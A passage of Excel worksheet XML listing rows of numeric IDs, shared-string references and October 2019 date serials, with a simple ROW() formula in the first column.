        <v>13142</v>
      </c>
    </row>
    <row r="6659" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6659">
        <f t="shared" ref="A6659:A6722" si="104">+ROW(A6658)</f>
        <v>6658</v>
      </c>
      <c r="B6659">
        <v>1658</v>
      </c>
      <c r="C6659" t="s">
        <v>9973</v>
      </c>
      <c r="D6659" s="1">
        <v>43755</v>
      </c>
      <c r="E6659" t="s">
        <v>13143</v>
      </c>
      <c r="F6659" t="s">
        <v>9975</v>
      </c>
      <c r="G6659" t="s">
        <v>13144</v>
      </c>
    </row>
    <row r="6660" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6660">
        <f t="shared" si="104"/>
        <v>6659</v>
      </c>
      <c r="B6660">
        <v>1659</v>
      </c>
      <c r="C6660" t="s">
        <v>9973</v>
      </c>
      <c r="D6660" s="1">
        <v>43757</v>
      </c>
      <c r="E6660" t="s">
        <v>13145</v>
      </c>
      <c r="F6660" t="s">
        <v>9975</v>
      </c>
      <c r="G6660" t="s">
        <v>13146</v>
      </c>
    </row>
    <row r="6661" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6661">
        <f t="shared" si="104"/>
        <v>6660</v>
      </c>
      <c r="B6661">
        <v>1660</v>
      </c>
      <c r="C6661" t="s">
        <v>9973</v>
      </c>
      <c r="D6661" s="1">
        <v>43744</v>
      </c>
      <c r="E6661" t="s">
        <v>13147</v>
      </c>
      <c r="F6661" t="s">
        <v>9975</v>
      </c>
      <c r="G6661" t="s">
        <v>13148</v>
      </c>
    </row>
    <row r="6662" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6662">
        <f t="shared" si="104"/>
        <v>6661</v>
      </c>
      <c r="B6662">
        <v>1661</v>
      </c>
      <c r="C6662" t="s">
        <v>9973</v>
      </c>
      <c r="D6662" s="1">
        <v>43749</v>
      </c>
      <c r="E6662" t="s">
        <v>13149</v>
      </c>
      <c r="F6662" t="s">
        <v>9975</v>
      </c>
      <c r="G6662" t="s">
        <v>13150</v>
      </c>
    </row>
    <row r="6663" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6663">
        <f t="shared" si="104"/>
        <v>6662</v>
      </c>
      <c r="B6663">
        <v>1662</v>
      </c>
      <c r="C6663" t="s">
        <v>9973</v>
      </c>
      <c r="D6663" s="1">
        <v>43743</v>
      </c>
      <c r="E6663" t="s">
        <v>13151</v>
      </c>
      <c r="F6663" t="s">
        <v>9975</v>
      </c>
      <c r="G6663" t="s">
        <v>13152</v>
      </c>
    </row>
    <row r="6664" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6664">
        <f t="shared" si="104"/>
        <v>6663</v>
      </c>
      <c r="B6664">
        <v>1663</v>
      </c>
      <c r="C6664" t="s">
        <v>9973</v>
      </c>
      <c r="D6664" s="1">
        <v>43753</v>
      </c>
      <c r="E6664" t="s">
        <v>10099</v>
      </c>
      <c r="F6664" t="s">
        <v>9975</v>
      </c>
      <c r="G6664" t="s">
        <v>13153</v>
      </c>
    </row>
    <row r="6665" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6665">
        <f t="shared" si="104"/>
        <v>6664</v>
      </c>
      <c r="B6665">
        <v>1664</v>
      </c>
      <c r="C6665" t="s">
        <v>9973</v>
      </c>
      <c r="D6665" s="1">
        <v>43743</v>
      </c>
      <c r="E6665" t="s">
        <v>13154</v>
      </c>
      <c r="F6665" t="s">
        <v>9975</v>
      </c>
      <c r="G6665" t="s">
        <v>13155</v>
      </c>
    </row>
    <row r="6666" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6666">
        <f t="shared" si="104"/>
        <v>6665</v>
      </c>
      <c r="B6666">
        <v>1665</v>
      </c>
      <c r="C6666" t="s">
        <v>9973</v>
      </c>
      <c r="D6666" s="1">
        <v>43738</v>
      </c>
      <c r="E6666" t="s">
        <v>13156</v>
      </c>
      <c r="F6666" t="s">
        <v>9975</v>
      </c>
      <c r="G6666" t="s">
        <v>13157</v>
      </c>
    </row>
    <row r="6667" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6667">
        <f t="shared" si="104"/>
        <v>6666</v>
      </c>
      <c r="B6667">
        <v>1666</v>
      </c>
      <c r="C6667" t="s">
        <v>9973</v>
      </c>
      <c r="D6667" s="1">
        <v>43742</v>
      </c>
      <c r="E6667" t="s">
        <v>10099</v>
      </c>
      <c r="F6667" t="s">
        <v>9975</v>
      </c>
      <c r="G6667" t="s">
        <v>13158</v>
      </c>
    </row>
    <row r="6668" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6668">
        <f t="shared" si="104"/>
        <v>6667</v>
      </c>
      <c r="B6668">
        <v>1667</v>
      </c>
      <c r="C6668" t="s">
        <v>9973</v>
      </c>
      <c r="D6668" s="1">
        <v>43741</v>
      </c>
      <c r="E6668" t="s">
        <v>13159</v>
      </c>
      <c r="F6668" t="s">
        <v>9975</v>
      </c>
      <c r="G6668" t="s">
        <v>13160</v>
      </c>
    </row>
    <row r="6669" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6669">
        <f t="shared" si="104"/>
        <v>6668</v>
      </c>
      <c r="B6669">
        <v>1668</v>
      </c>
      <c r="C6669" t="s">
        <v>9973</v>
      </c>
      <c r="D6669" s="1">
        <v>43748</v>
      </c>
      <c r="E6669" t="s">
        <v>13161</v>
      </c>
      <c r="F6669" t="s">
        <v>9975</v>
      </c>
      <c r="G6669" t="s">
        <v>13162</v>
      </c>
    </row>
    <row r="6670" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6670">
        <f t="shared" si="104"/>
        <v>6669</v>
      </c>
      <c r="B6670">
        <v>1669</v>
      </c>
      <c r="C6670" t="s">
        <v>9973</v>
      </c>
      <c r="D6670" s="1">
        <v>43742</v>
      </c>
      <c r="E6670" t="s">
        <v>13163</v>
      </c>
      <c r="F6670" t="s">
        <v>9975</v>
      </c>
      <c r="G6670" t="s">
        <v>13164</v>
      </c>
    </row>
    <row r="6671" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6671">
        <f t="shared" si="104"/>
        <v>6670</v>
      </c>
      <c r="B6671">
        <v>1670</v>
      </c>
      <c r="C6671" t="s">
        <v>9973</v>
      </c>
      <c r="D6671" s="1">
        <v>43754</v>
      </c>
      <c r="E6671" t="s">
        <v>13165</v>
      </c>
      <c r="F6671" t="s">
        <v>9975</v>
      </c>
      <c r="G6671" t="s">
        <v>13166</v>
      </c>
    </row>
    <row r="6672" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6672">
        <f t="shared" si="104"/>
        <v>6671</v>
      </c>
      <c r="B6672">
        <v>1671</v>
      </c>
      <c r="C6672" t="s">
        <v>9973</v>
      </c>
      <c r="D6672" s="1">
        <v>43749</v>
      </c>
      <c r="E6672" t="s">
        <v>13167</v>
      </c>
      <c r="F6672" t="s">
        <v>9975</v>
      </c>
      <c r="G6672" t="s">
        <v>13168</v>
      </c>
    </row>
    <row r="6673" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6673">
        <f t="shared" si="104"/>
        <v>6672</v>
      </c>
      <c r="B6673">
        <v>1672</v>
      </c>
      <c r="C6673" t="s">
        <v>9973</v>
      </c>
      <c r="D6673" s="1">
        <v>43748</v>
      </c>
      <c r="E6673" t="s">
        <v>13169</v>
      </c>
      <c r="F6673" t="s">
        <v>9975</v>
      </c>
      <c r="G6673" t="s">
        <v>13170</v>
      </c>
    </row>
    <row r="6674" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6674">
        <f t="shared" si="104"/>
        <v>6673</v>
      </c>
      <c r="B6674">
        <v>1673</v>
      </c>
      <c r="C6674" t="s">
        <v>9973</v>
      </c>
      <c r="D6674" s="1">
        <v>43745</v>
      </c>
      <c r="E6674" t="s">
        <v>13171</v>
      </c>
      <c r="F6674" t="s">
        <v>9975</v>
      </c>
      <c r="G6674" t="s">
        <v>13172</v>
      </c>
    </row>
    <row r="6675" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6675">
        <f t="shared" si="104"/>
        <v>6674</v>
      </c>
      <c r="B6675">
        <v>1674</v>
      </c>
      <c r="C6675" t="s">
        <v>9973</v>
      </c>
      <c r="D6675" s="1">
        <v>43753</v>
      </c>
      <c r="E6675" t="s">
        <v>13173</v>
      </c>
      <c r="F6675" t="s">
        <v>9975</v>
      </c>
      <c r="G6675" t="s">
        <v>13174</v>
      </c>
    </row>
    <row r="6676" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6676">
        <f t="shared" si="104"/>
        <v>6675</v>
      </c>
      <c r="B6676">
        <v>1675</v>
      </c>
      <c r="C6676" t="s">
        <v>9973</v>
      </c>
      <c r="D6676" s="1">
        <v>43748</v>
      </c>
      <c r="E6676" t="s">
        <v>13175</v>
      </c>
      <c r="F6676" t="s">
        <v>9975</v>
      </c>
      <c r="G6676" t="s">
        <v>13176</v>
      </c>
    </row>
    <row r="6677" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6677">
        <f t="shared" si="104"/>
        <v>6676</v>
      </c>
      <c r="B6677">
        <v>1676</v>
      </c>
      <c r="C6677" t="s">
        <v>9973</v>
      </c>
      <c r="D6677" s="1">
        <v>43757</v>
      </c>
      <c r="E6677" t="s">
        <v>13177</v>
      </c>
      <c r="F6677" t="s">
        <v>9975</v>
      </c>
      <c r="G6677" t="s">
        <v>13178</v>
      </c>
    </row>
    <row r="6678" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6678">
        <f t="shared" si="104"/>
        <v>6677</v>
      </c>
      <c r="B6678">
        <v>1677</v>
      </c>
      <c r="C6678" t="s">
        <v>9973</v>
      </c>
      <c r="D6678" s="1">
        <v>43744</v>
      </c>
      <c r="E6678" t="s">
        <v>13179</v>
      </c>
      <c r="F6678" t="s">
        <v>9975</v>
      </c>
      <c r="G6678" t="s">
        <v>13180</v>
      </c>
    </row>
    <row r="6679" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6679">
        <f t="shared" si="104"/>
        <v>6678</v>
      </c>
      <c r="B6679">
        <v>1678</v>
      </c>
      <c r="C6679" t="s">
        <v>9973</v>
      </c>
      <c r="D6679" s="1">
        <v>43749</v>
      </c>
      <c r="E6679" t="s">
        <v>13181</v>
      </c>
      <c r="F6679" t="s">
        <v>9975</v>
      </c>
      <c r="G6679" t="s">
        <v>13182</v>
      </c>
    </row>
    <row r="6680" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6680">
        <f t="shared" si="104"/>
        <v>6679</v>
      </c>
      <c r="B6680">
        <v>1679</v>
      </c>
      <c r="C6680" t="s">
        <v>9973</v>
      </c>
      <c r="D6680" s="1">
        <v>43743</v>
      </c>
      <c r="E6680" t="s">
        <v>13183</v>
      </c>
      <c r="F6680" t="s">
        <v>9975</v>
      </c>
      <c r="G6680" t="s">
        <v>13184</v>
      </c>
    </row>
    <row r="6681" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6681">
        <f t="shared" si="104"/>
        <v>6680</v>
      </c>
      <c r="B6681">
        <v>1680</v>
      </c>
      <c r="C6681" t="s">
        <v>9973</v>
      </c>
      <c r="D6681" s="1">
        <v>43755</v>
      </c>
      <c r="E6681" t="s">
        <v>10018</v>
      </c>
      <c r="F6681" t="s">
        <v>9975</v>
      </c>
      <c r="G6681" t="s">
        <v>13185</v>
      </c>
    </row>
    <row r="6682" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6682">
        <f t="shared" si="104"/>
        <v>6681</v>
      </c>
      <c r="B6682">
        <v>1681</v>
      </c>
      <c r="C6682" t="s">
        <v>9973</v>
      </c>
      <c r="D6682" s="1">
        <v>43751</v>
      </c>
      <c r="E6682" t="s">
        <v>13186</v>
      </c>
      <c r="F6682" t="s">
        <v>9975</v>
      </c>
      <c r="G6682" t="s">
        <v>13187</v>
      </c>
    </row>
    <row r="6683" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6683">
        <f t="shared" si="104"/>
        <v>6682</v>
      </c>
      <c r="B6683">
        <v>1682</v>
      </c>
      <c r="C6683" t="s">
        <v>9973</v>
      </c>
      <c r="D6683" s="1">
        <v>43756</v>
      </c>
      <c r="E6683" t="s">
        <v>13188</v>
      </c>
      <c r="F6683" t="s">
        <v>9975</v>
      </c>
      <c r="G6683" t="s">
        <v>13189</v>
      </c>
    </row>
    <row r="6684" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6684">
        <f t="shared" si="104"/>
        <v>6683</v>
      </c>
      <c r="B6684">
        <v>1683</v>
      </c>
      <c r="C6684" t="s">
        <v>9973</v>
      </c>
      <c r="D6684" s="1">
        <v>43741</v>
      </c>
      <c r="E6684" t="s">
        <v>13190</v>
      </c>
      <c r="F6684" t="s">
        <v>9975</v>
      </c>
      <c r="G6684" t="s">
        <v>13191</v>
      </c>
    </row>
    <row r="6685" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6685">
        <f t="shared" si="104"/>
        <v>6684</v>
      </c>
      <c r="B6685">
        <v>1684</v>
      </c>
      <c r="C6685" t="s">
        <v>9973</v>
      </c>
      <c r="D6685" s="1">
        <v>43752</v>
      </c>
      <c r="E6685" t="s">
        <v>13192</v>
      </c>
      <c r="F6685" t="s">
        <v>9975</v>
      </c>
      <c r="G6685" t="s">
        <v>13193</v>
      </c>
    </row>
    <row r="6686" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6686">
        <f t="shared" si="104"/>
        <v>6685</v>
      </c>
      <c r="B6686">
        <v>1685</v>
      </c>
      <c r="C6686" t="s">
        <v>9973</v>
      </c>
      <c r="D6686" s="1">
        <v>43753</v>
      </c>
      <c r="E6686" t="s">
        <v>13194</v>
      </c>
      <c r="F6686" t="s">
        <v>9975</v>
      </c>
      <c r="G6686" t="s">
        <v>13195</v>
      </c>
    </row>
    <row r="6687" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6687">
        <f t="shared" si="104"/>
        <v>6686</v>
      </c>
      <c r="B6687">
        <v>1686</v>
      </c>
      <c r="C6687" t="s">
        <v>9973</v>
      </c>
      <c r="D6687" s="1">
        <v>43744</v>
      </c>
      <c r="E6687" t="s">
        <v>13196</v>
      </c>
      <c r="F6687" t="s">
        <v>9978</v>
      </c>
      <c r="G6687" t="s">
        <v>13197</v>
      </c>
    </row>
    <row r="6688" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6688">
        <f t="shared" si="104"/>
        <v>6687</v>
      </c>
      <c r="B6688">
        <v>1687</v>
      </c>
      <c r="C6688" t="s">
        <v>9973</v>
      </c>
      <c r="D6688" s="1">
        <v>43740</v>
      </c>
      <c r="E6688" t="s">
        <v>13198</v>
      </c>
      <c r="F6688" t="s">
        <v>9975</v>
      </c>
      <c r="G6688" t="s">
        <v>13199</v>
      </c>
    </row>
    <row r="6689" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6689">
        <f t="shared" si="104"/>
        <v>6688</v>
      </c>
      <c r="B6689">
        <v>1688</v>
      </c>
      <c r="C6689" t="s">
        <v>9973</v>
      </c>
      <c r="D6689" s="1">
        <v>43750</v>
      </c>
      <c r="E6689" t="s">
        <v>13200</v>
      </c>
      <c r="F6689" t="s">
        <v>9975</v>
      </c>
      <c r="G6689" t="s">
        <v>13201</v>
      </c>
    </row>
    <row r="6690" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6690">
        <f t="shared" si="104"/>
        <v>6689</v>
      </c>
      <c r="B6690">
        <v>1689</v>
      </c>
      <c r="C6690" t="s">
        <v>9973</v>
      </c>
      <c r="D6690" s="1">
        <v>43752</v>
      </c>
      <c r="E6690" t="s">
        <v>13202</v>
      </c>
      <c r="F6690" t="s">
        <v>9975</v>
      </c>
      <c r="G6690" t="s">
        <v>13203</v>
      </c>
    </row>
    <row r="6691" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6691">
        <f t="shared" si="104"/>
        <v>6690</v>
      </c>
      <c r="B6691">
        <v>1690</v>
      </c>
      <c r="C6691" t="s">
        <v>9973</v>
      </c>
      <c r="D6691" s="1">
        <v>43746</v>
      </c>
      <c r="E6691" t="s">
        <v>13204</v>
      </c>
      <c r="F6691" t="s">
        <v>9975</v>
      </c>
      <c r="G6691" t="s">
        <v>13205</v>
      </c>
    </row>
    <row r="6692" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6692">
        <f t="shared" si="104"/>
        <v>6691</v>
      </c>
      <c r="B6692">
        <v>1691</v>
      </c>
      <c r="C6692" t="s">
        <v>9973</v>
      </c>
      <c r="D6692" s="1">
        <v>43757</v>
      </c>
      <c r="E6692" t="s">
        <v>13206</v>
      </c>
      <c r="F6692" t="s">
        <v>9975</v>
      </c>
      <c r="G6692" t="s">
        <v>13207</v>
      </c>
    </row>
    <row r="6693" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6693">
        <f t="shared" si="104"/>
        <v>6692</v>
      </c>
      <c r="B6693">
        <v>1692</v>
      </c>
      <c r="C6693" t="s">
        <v>9973</v>
      </c>
      <c r="D6693" s="1">
        <v>43742</v>
      </c>
      <c r="E6693" t="s">
        <v>13208</v>
      </c>
      <c r="F6693" t="s">
        <v>9975</v>
      </c>
      <c r="G6693" t="s">
        <v>13209</v>
      </c>
    </row>
    <row r="6694" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6694">
        <f t="shared" si="104"/>
        <v>6693</v>
      </c>
      <c r="B6694">
        <v>1693</v>
      </c>
      <c r="C6694" t="s">
        <v>9973</v>
      </c>
      <c r="D6694" s="1">
        <v>43757</v>
      </c>
      <c r="E6694" t="s">
        <v>13210</v>
      </c>
      <c r="F6694" t="s">
        <v>9975</v>
      </c>
      <c r="G6694" t="s">
        <v>13211</v>
      </c>
    </row>
    <row r="6695" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6695">
        <f t="shared" si="104"/>
        <v>6694</v>
      </c>
      <c r="B6695">
        <v>1694</v>
      </c>
      <c r="C6695" t="s">
        <v>9973</v>
      </c>
      <c r="D6695" s="1">
        <v>43752</v>
      </c>
      <c r="E6695" t="s">
        <v>13212</v>
      </c>
      <c r="F6695" t="s">
        <v>9975</v>
      </c>
      <c r="G6695" t="s">
        <v>13213</v>
      </c>
    </row>
    <row r="6696" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6696">
        <f t="shared" si="104"/>
        <v>6695</v>
      </c>
      <c r="B6696">
        <v>1695</v>
      </c>
      <c r="C6696" t="s">
        <v>9973</v>
      </c>
      <c r="D6696" s="1">
        <v>43742</v>
      </c>
      <c r="E6696" t="s">
        <v>13214</v>
      </c>
      <c r="F6696" t="s">
        <v>9975</v>
      </c>
      <c r="G6696" t="s">
        <v>13215</v>
      </c>
    </row>
    <row r="6697" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6697">
        <f t="shared" si="104"/>
        <v>6696</v>
      </c>
      <c r="B6697">
        <v>1696</v>
      </c>
      <c r="C6697" t="s">
        <v>9973</v>
      </c>
      <c r="D6697" s="1">
        <v>43747</v>
      </c>
      <c r="E6697" t="s">
        <v>13216</v>
      </c>
      <c r="F6697" t="s">
        <v>9975</v>
      </c>
      <c r="G6697" t="s">
        <v>13217</v>
      </c>
    </row>
    <row r="6698" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6698">
        <f t="shared" si="104"/>
        <v>6697</v>
      </c>
      <c r="B6698">
        <v>1697</v>
      </c>
      <c r="C6698" t="s">
        <v>9973</v>
      </c>
      <c r="D6698" s="1">
        <v>43748</v>
      </c>
      <c r="E6698" t="s">
        <v>13218</v>
      </c>
      <c r="F6698" t="s">
        <v>10021</v>
      </c>
      <c r="G6698" t="s">
        <v>13219</v>
      </c>
    </row>
    <row r="6699" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6699">
        <f t="shared" si="104"/>
        <v>6698</v>
      </c>
      <c r="B6699">
        <v>1698</v>
      </c>
      <c r="C6699" t="s">
        <v>9973</v>
      </c>
      <c r="D6699" s="1">
        <v>43755</v>
      </c>
      <c r="E6699" t="s">
        <v>13220</v>
      </c>
      <c r="F6699" t="s">
        <v>9975</v>
      </c>
      <c r="G6699" t="s">
        <v>13221</v>
      </c>
    </row>
    <row r="6700" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6700">
        <f t="shared" si="104"/>
        <v>6699</v>
      </c>
      <c r="B6700">
        <v>1699</v>
      </c>
      <c r="C6700" t="s">
        <v>9973</v>
      </c>
      <c r="D6700" s="1">
        <v>43753</v>
      </c>
      <c r="E6700" t="s">
        <v>13222</v>
      </c>
      <c r="F6700" t="s">
        <v>9975</v>
      </c>
      <c r="G6700" t="s">
        <v>13223</v>
      </c>
    </row>
    <row r="6701" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6701">
        <f t="shared" si="104"/>
        <v>6700</v>
      </c>
      <c r="B6701">
        <v>1700</v>
      </c>
      <c r="C6701" t="s">
        <v>9973</v>
      </c>
      <c r="D6701" s="1">
        <v>43750</v>
      </c>
      <c r="E6701" t="s">
        <v>13224</v>
      </c>
      <c r="F6701" t="s">
        <v>9975</v>
      </c>
      <c r="G6701" t="s">
        <v>13225</v>
      </c>
    </row>
    <row r="6702" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6702">
        <f t="shared" si="104"/>
        <v>6701</v>
      </c>
      <c r="B6702">
        <v>1701</v>
      </c>
      <c r="C6702" t="s">
        <v>9973</v>
      </c>
      <c r="D6702" s="1">
        <v>43739</v>
      </c>
      <c r="E6702" t="s">
        <v>13226</v>
      </c>
      <c r="F6702" t="s">
        <v>9975</v>
      </c>
      <c r="G6702" t="s">
        <v>13227</v>
      </c>
    </row>
    <row r="6703" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6703">
        <f t="shared" si="104"/>
        <v>6702</v>
      </c>
      <c r="B6703">
        <v>1702</v>
      </c>
      <c r="C6703" t="s">
        <v>9973</v>
      </c>
      <c r="D6703" s="1">
        <v>43752</v>
      </c>
      <c r="E6703" t="s">
        <v>13228</v>
      </c>
      <c r="F6703" t="s">
        <v>9975</v>
      </c>
      <c r="G6703" t="s">
        <v>13229</v>
      </c>
    </row>
    <row r="6704" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6704">
        <f t="shared" si="104"/>
        <v>6703</v>
      </c>
      <c r="B6704">
        <v>1703</v>
      </c>
      <c r="C6704" t="s">
        <v>9973</v>
      </c>
      <c r="D6704" s="1">
        <v>43755</v>
      </c>
      <c r="E6704" t="s">
        <v>13230</v>
      </c>
      <c r="F6704" t="s">
        <v>9975</v>
      </c>
      <c r="G6704" t="s">
        <v>13231</v>
      </c>
    </row>
    <row r="6705" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6705">
        <f t="shared" si="104"/>
        <v>6704</v>
      </c>
      <c r="B6705">
        <v>1704</v>
      </c>
      <c r="C6705" t="s">
        <v>9973</v>
      </c>
      <c r="D6705" s="1">
        <v>43743</v>
      </c>
      <c r="E6705" t="s">
        <v>10018</v>
      </c>
      <c r="F6705" t="s">
        <v>9975</v>
      </c>
      <c r="G6705" t="s">
        <v>13232</v>
      </c>
    </row>
    <row r="6706" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6706">
        <f t="shared" si="104"/>
        <v>6705</v>
      </c>
      <c r="B6706">
        <v>1705</v>
      </c>
      <c r="C6706" t="s">
        <v>9973</v>
      </c>
      <c r="D6706" s="1">
        <v>43754</v>
      </c>
      <c r="E6706" t="s">
        <v>13233</v>
      </c>
      <c r="F6706" t="s">
        <v>9975</v>
      </c>
      <c r="G6706" t="s">
        <v>13234</v>
      </c>
    </row>
    <row r="6707" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6707">
        <f t="shared" si="104"/>
        <v>6706</v>
      </c>
      <c r="B6707">
        <v>1706</v>
      </c>
      <c r="C6707" t="s">
        <v>9973</v>
      </c>
      <c r="D6707" s="1">
        <v>43750</v>
      </c>
      <c r="E6707" t="s">
        <v>13235</v>
      </c>
      <c r="F6707" t="s">
        <v>9975</v>
      </c>
      <c r="G6707" t="s">
        <v>13236</v>
      </c>
    </row>
    <row r="6708" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6708">
        <f t="shared" si="104"/>
        <v>6707</v>
      </c>
      <c r="B6708">
        <v>1707</v>
      </c>
      <c r="C6708" t="s">
        <v>9973</v>
      </c>
      <c r="D6708" s="1">
        <v>43748</v>
      </c>
      <c r="E6708" t="s">
        <v>13237</v>
      </c>
      <c r="F6708" t="s">
        <v>9975</v>
      </c>
      <c r="G6708" t="s">
        <v>13238</v>
      </c>
    </row>
    <row r="6709" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6709">
        <f t="shared" si="104"/>
        <v>6708</v>
      </c>
      <c r="B6709">
        <v>1708</v>
      </c>
      <c r="C6709" t="s">
        <v>9973</v>
      </c>
      <c r="D6709" s="1">
        <v>43754</v>
      </c>
      <c r="E6709" t="s">
        <v>13239</v>
      </c>
      <c r="F6709" t="s">
        <v>9975</v>
      </c>
      <c r="G6709" t="s">
        <v>13240</v>
      </c>
    </row>
    <row r="6710" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6710">
        <f t="shared" si="104"/>
        <v>6709</v>
      </c>
      <c r="B6710">
        <v>1709</v>
      </c>
      <c r="C6710" t="s">
        <v>9973</v>
      </c>
      <c r="D6710" s="1">
        <v>43746</v>
      </c>
      <c r="E6710" t="s">
        <v>13241</v>
      </c>
      <c r="F6710" t="s">
        <v>9975</v>
      </c>
      <c r="G6710" t="s">
        <v>13242</v>
      </c>
    </row>
    <row r="6711" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6711">
        <f t="shared" si="104"/>
        <v>6710</v>
      </c>
      <c r="B6711">
        <v>1710</v>
      </c>
      <c r="C6711" t="s">
        <v>9973</v>
      </c>
      <c r="D6711" s="1">
        <v>43753</v>
      </c>
      <c r="E6711" t="s">
        <v>13243</v>
      </c>
      <c r="F6711" t="s">
        <v>9975</v>
      </c>
      <c r="G6711" t="s">
        <v>13244</v>
      </c>
    </row>
    <row r="6712" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6712">
        <f t="shared" si="104"/>
        <v>6711</v>
      </c>
      <c r="B6712">
        <v>1711</v>
      </c>
      <c r="C6712" t="s">
        <v>9973</v>
      </c>
      <c r="D6712" s="1">
        <v>43741</v>
      </c>
      <c r="E6712" t="s">
        <v>13245</v>
      </c>
      <c r="F6712" t="s">
        <v>9975</v>
      </c>
      <c r="G6712" t="s">
        <v>13246</v>
      </c>
    </row>
    <row r="6713" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6713">
        <f t="shared" si="104"/>
        <v>6712</v>
      </c>
      <c r="B6713">
        <v>1712</v>
      </c>
      <c r="C6713" t="s">
        <v>9973</v>
      </c>
      <c r="D6713" s="1">
        <v>43754</v>
      </c>
      <c r="E6713" t="s">
        <v>10099</v>
      </c>
      <c r="F6713" t="s">
        <v>9975</v>
      </c>
      <c r="G6713" t="s">
        <v>13247</v>
      </c>
    </row>
    <row r="6714" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6714">
        <f t="shared" si="104"/>
        <v>6713</v>
      </c>
      <c r="B6714">
        <v>1713</v>
      </c>
      <c r="C6714" t="s">
        <v>9973</v>
      </c>
      <c r="D6714" s="1">
        <v>43752</v>
      </c>
      <c r="E6714" t="s">
        <v>13248</v>
      </c>
      <c r="F6714" t="s">
        <v>9975</v>
      </c>
      <c r="G6714" t="s">
        <v>13249</v>
      </c>
    </row>
    <row r="6715" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6715">
        <f t="shared" si="104"/>
        <v>6714</v>
      </c>
      <c r="B6715">
        <v>1714</v>
      </c>
      <c r="C6715" t="s">
        <v>9973</v>
      </c>
      <c r="D6715" s="1">
        <v>43750</v>
      </c>
      <c r="E6715" t="s">
        <v>13250</v>
      </c>
      <c r="F6715" t="s">
        <v>9975</v>
      </c>
      <c r="G6715" t="s">
        <v>13251</v>
      </c>
    </row>
    <row r="6716" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6716">
        <f t="shared" si="104"/>
        <v>6715</v>
      </c>
      <c r="B6716">
        <v>1715</v>
      </c>
      <c r="C6716" t="s">
        <v>9973</v>
      </c>
      <c r="D6716" s="1">
        <v>43742</v>
      </c>
      <c r="E6716" t="s">
        <v>13252</v>
      </c>
      <c r="F6716" t="s">
        <v>9975</v>
      </c>
      <c r="G6716" t="s">
        <v>13253</v>
      </c>
    </row>
    <row r="6717" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6717">
        <f t="shared" si="104"/>
        <v>6716</v>
      </c>
      <c r="B6717">
        <v>1716</v>
      </c>
      <c r="C6717" t="s">
        <v>9973</v>
      </c>
      <c r="D6717" s="1">
        <v>43743</v>
      </c>
      <c r="E6717" t="s">
        <v>13254</v>
      </c>
      <c r="F6717" t="s">
        <v>9975</v>
      </c>
      <c r="G6717" t="s">
        <v>13255</v>
      </c>
    </row>
    <row r="6718" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6718">
        <f t="shared" si="104"/>
        <v>6717</v>
      </c>
      <c r="B6718">
        <v>1717</v>
      </c>
      <c r="C6718" t="s">
        <v>9973</v>
      </c>
      <c r="D6718" s="1">
        <v>43740</v>
      </c>
      <c r="E6718" t="s">
        <v>13256</v>
      </c>
      <c r="F6718" t="s">
        <v>9975</v>
      </c>
      <c r="G6718" t="s">
        <v>13257</v>
      </c>
    </row>
    <row r="6719" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6719">
        <f t="shared" si="104"/>
        <v>6718</v>
      </c>
      <c r="B6719">
        <v>1718</v>
      </c>
      <c r="C6719" t="s">
        <v>9973</v>
      </c>
      <c r="D6719" s="1">
        <v>43739</v>
      </c>
      <c r="E6719" t="s">
        <v>13258</v>
      </c>
      <c r="F6719" t="s">
